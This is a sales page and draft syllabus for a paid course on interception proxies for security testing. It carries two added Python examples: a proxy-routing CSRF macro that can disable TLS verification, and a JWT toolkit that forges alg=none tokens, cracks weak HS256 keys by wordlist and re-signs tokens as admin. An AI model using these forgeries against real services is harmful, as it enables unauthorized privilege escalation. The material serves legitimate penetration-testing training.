
Course Releases Feb 18

Interception Proxies for Modern Security Assessments:


This course is designed to provide in-depth knowledge of interception proxies like Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper. By mastering these tools, you’ll gain the skills necessary to conduct security assessments on modern applications.



What You’ll Learn:

  • Set up and use various interception proxies effectively.
  • Understand the unique strengths and weaknesses of Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper.
  • Perform security testing on web applications, mobile apps, and thick clients.
  • Explore plugin ecosystems and third-party integrations for advanced capabilities.
  • Analyze real-world case studies of vulnerabilities discovered using interception proxies.

Why Choose This Course?

  • Comprehensive and Tool-Agnostic: Learn multiple tools to tailor your approach based on project needs.
  • Practical Focus: Hands-on labs and real-world case studies ensure you can apply concepts immediately.
  • Expert Guidance: Jhaddix shares proven methods and advanced tips gleaned from years of experience.

Who Should Enroll?

  • Security professionals seeking to expand their toolkit.
  • Penetration testers and bug bounty hunters aiming to deepen their expertise.
  • Developers and QA specialists integrating security into their workflows.
  • Anyone looking to master modern interception proxies for effective security assessments.

What’s Included:

  • Video modules covering theoretical and practical topics.
  • Hands-on labs with real-world scenarios.


** This syllabus is still in draft. It may not represent the full gamut of topics in the final class **




Course Outline:


Module 1: Introduction to Interception Proxies

Why Interception Proxies Are Essential:

  • The role of proxies in application security testing.
  • Practical applications: Debugging, reconnaissance, and exploitation.

Overview of Key Tools:

  • Burp Suite: The industry standard for web application security testing.
  • Caido: A fresh perspective on interception proxies with modern UI/UX.
  • OWASP ZAP: Open-source and highly extensible for community-driven testing.
  • Fiddler: A powerful tool for analyzing HTTP/S traffic from Windows-based thick clients.
  • Hopper: A brief overview of an alternative for Mac systems.

Activity:

  • Install and configure the proxy tools to intercept basic web traffic.
  • Discuss common "gotchas" encountered during setup.

Module 2: Tool-Specific Deep Dives

Burp Suite:

  • Setting up projects, workspaces, and target scoping.
  • Using key tools: Repeater, Intruder, and Scanner.
  • Must-have plugins.

Caido:

  • Exploring the modern interface and workflow.
  • Comparison with Burp Suite: Strengths and use cases.

OWASP ZAP:

  • Crawling and passive scanning workflows.
  • Extending functionality with add-ons like Active Scan Rules and HUD.
  • Integrating ZAP into automated DAST pipelines.

Fiddler:

  • Why Fiddler?
  • Capturing and replaying traffic for debugging and testing.
  • A cursory look at FiddlerScript for custom scenarios.

Hopper:

  • Analyzing and intercepting traffic from thick clients.



Module 3: Web Application Testing with Proxies

Workflows for Web Application Testing:

  • Mapping applications with crawlers and manual exploration.
  • Identifying and exploiting common vulnerabilities: XSS, SQLi, CSRF, and more.

Enhancing Productivity:

  • Leveraging automation and macros in Burp Suite and ZAP.
  • Integrating with command-line workflows for testers.
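The two items above (automation and macros in Burp Suite and ZAP, and command-line workflows) and the Module 1 activity (configuring a proxy to intercept basic traffic) come together in the short script below. It is an added example for this page, not course material or any vendor's code: it routes a scripted request through an intercepting proxy and handles a CSRF token the way a Burp or ZAP session-handling macro does. The listener address 127.0.0.1:8080, the exported CA file proxy-ca.pem, the host target.example and the sample login form are all assumptions constructed for illustration.

```python
"""Drive a scripted request through an intercepting proxy and handle a CSRF
token the way a Burp/ZAP session-handling macro does.

Added example for this page, not course material. Assumptions: the proxy
listens on 127.0.0.1:8080 and its CA certificate was exported to proxy-ca.pem;
target.example and the form layout are constructed for illustration.
"""
import os
import re
import ssl
import urllib.parse
import urllib.request

PROXY_URL = "http://127.0.0.1:8080"   # assumed proxy listener
PROXY_CA = "proxy-ca.pem"             # assumed exported proxy CA (PEM)

# Constructed sample login form, standing in for the real response.
SAMPLE_FORM = """
<form method="post" action="/login">
  <input type="hidden" name="csrf_token" value="9f1c3b2a7e0d4c5b">
  <input name="user"><input name="pass" type="password">
</form>
"""


def build_opener(proxy_url=PROXY_URL, ca_file=None):
    """Return an opener that sends both http and https through the proxy.

    HTTPS is tunneled with CONNECT, so the proxy presents its own certificate
    for the target; trusting the proxy CA is what makes decryption work.
    With ca_file=None verification is switched off, which is acceptable only
    in a lab and is the classic "gotcha" when it leaks into real code."""
    if ca_file:
        ctx = ssl.create_default_context(cafile=ca_file)
    else:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy_url, "https": proxy_url}),
        urllib.request.HTTPSHandler(context=ctx),
    )


# Matches a hidden input whose name contains "csrf"; assumes name precedes value.
CSRF_RE = re.compile(
    r'name="(?P<name>[^"]*csrf[^"]*)"\s+value="(?P<value>[^"]+)"', re.IGNORECASE)


def extract_csrf(html):
    """The 'extract from response' half of a macro: (field_name, token) or None."""
    m = CSRF_RE.search(html)
    return (m.group("name"), m.group("value")) if m else None


def build_login_request(base_url, form_html, username, password):
    """The 'inject into next request' half: a POST carrying the fresh token."""
    found = extract_csrf(form_html)
    if found is None:
        raise ValueError("no CSRF field found; the macro would stall here")
    name, token = found
    body = urllib.parse.urlencode(
        {name: token, "user": username, "pass": password}).encode()
    req = urllib.request.Request(base_url + "/login", data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    return req


if __name__ == "__main__":
    ca = PROXY_CA if os.path.exists(PROXY_CA) else None
    opener = build_opener(ca_file=ca)
    # Live flow (needs a running proxy and a reachable target):
    #   form_html = opener.open("https://target.example/login").read().decode()
    #   opener.open(build_login_request("https://target.example", form_html, "alice", "pw"))
    req = build_login_request("https://target.example", SAMPLE_FORM, "alice", "pw")
    print(req.full_url, req.data.decode())
```

Every request the opener sends lands in the proxy's history, so the same script can be replayed with Repeater or fed to Intruder once the macro behaviour is confirmed; the CA handling is the part to get right first, because an opener with verification disabled hides the certificate errors that would otherwise tell you the proxy is not in the path.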

Module 4: Mobile Application and Thick Client Testing

Mobile Application Proxying:

  • Setting up proxies for mobile traffic interception.
  • Testing APIs, analyzing insecure storage, and bypassing SSL pinning.

Thick Client Proxying with Hopper and Fiddler:

  • Reverse engineering traffic from proprietary protocols.
  • Analyzing communication channels for security flaws.

Activity:

  • Intercept and analyze API traffic from a mobile application and a thick client.

Module 5: Plugins, Extensions, and Third-Party Integrations

Extending Proxy Capabilities:

  • Key plugins for Burp Suite and ZAP that enhance testing efficiency.
  • Exploring Caido’s ecosystem of integrations.
  • Introduction to fuzzing payload projects.

Integrating Fuzzers and Automation Tools:

  • Using ffuf, wfuzz, and other tools with proxies.


Authentication and Session Handling:

  • Testing authentication flows (OAuth, SAML, JWT).
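For the JWT part of that item, the checks a tester runs on a token captured in the proxy history are small enough to script. The block below is an added example for this page, not course material or any tool's built-in plugin: it decodes a token without verifying it, flags alg=none, missing or past exp, builds the alg=none variant to replay from Repeater, runs an offline wordlist attack on an HS256 signature, and re-signs the token with changed claims once the key is recovered. The sample token, its claims and the deliberately weak key "secret" are constructed here; nothing is taken from a real service.

```python
"""Inspect a JWT pulled from proxy history and build the variants a tester
replays from Repeater: alg=none, expiry checks, and a re-signed token after
recovering a weak HS256 secret.

Added example for this page, not course material; stdlib only. The sample
token, its claims and the deliberately weak key "secret" are constructed.
"""
import base64
import hashlib
import hmac
import json
import time


def b64url_decode(part):
    """JWT segments drop base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def parse_jwt(token):
    """Split a compact JWS into (header, claims, signature) without verifying.
    Decoding is safe; acting on the claims without verification is the bug."""
    head, body, sig = token.split(".")
    return (json.loads(b64url_decode(head)), json.loads(b64url_decode(body)),
            b64url_decode(sig))


def hs256_sign(header, claims, key):
    signing_input = _segment(header) + "." + _segment(claims)
    mac = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def review(token, now=None):
    """Return findings worth a manual test: alg none, no exp, or expired."""
    header, claims, _ = parse_jwt(token)
    now = time.time() if now is None else now
    findings = []
    if str(header.get("alg", "")).lower() == "none":
        findings.append("issuer uses alg=none")
    if "exp" not in claims:
        findings.append("no exp claim: token never expires")
    elif claims["exp"] < now:
        findings.append("expired: check whether the server still accepts it")
    return findings


def forge_none(token):
    """Same claims, alg=none, empty signature. Acceptance means verification is off."""
    header, claims, _ = parse_jwt(token)
    return _segment(dict(header, alg="none")) + "." + _segment(claims) + "."


def crack_hs256(token, candidates):
    """Offline wordlist attack on the HMAC; returns the key or None."""
    head, body, sig = token.split(".")
    target = b64url_decode(sig)
    for key in candidates:
        mac = hmac.new(key.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return key
    return None


def resign(token, overrides, key):
    """Change claims and re-sign with a recovered key, e.g. role escalation."""
    header, claims, _ = parse_jwt(token)
    return hs256_sign(header, dict(claims, **overrides), key)


# Constructed sample: what a captured "Authorization: Bearer" header might carry.
SAMPLE_KEY = "secret"
SAMPLE_TOKEN = hs256_sign({"alg": "HS256", "typ": "JWT"},
                          {"sub": "alice", "role": "user", "exp": 1700000000},
                          SAMPLE_KEY)

if __name__ == "__main__":
    print(review(SAMPLE_TOKEN))
    print("alg=none variant:", forge_none(SAMPLE_TOKEN))
    key = crack_hs256(SAMPLE_TOKEN, ["password", "changeme", "secret"])
    if key:
        print("recovered key:", key)
        print("admin token:", resign(SAMPLE_TOKEN, {"role": "admin"}, key))
```

Each forged token is only a hypothesis until it is replayed against the real endpoint: paste it into the captured request in Repeater and compare the response with the original. A 200 on the alg=none variant, or on a token re-signed with a wordlist key, is the finding; a rejection just rules that path out.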

Module 6: Case Studies and Advanced Scenarios

Case Studies:

  • Examples of real-world vulnerabilities uncovered using proxies.
  • Creative solutions to challenges like WAFs, Captchas, and rate limiting.

Purchase Interception Proxies for Modern Security Assessments

$600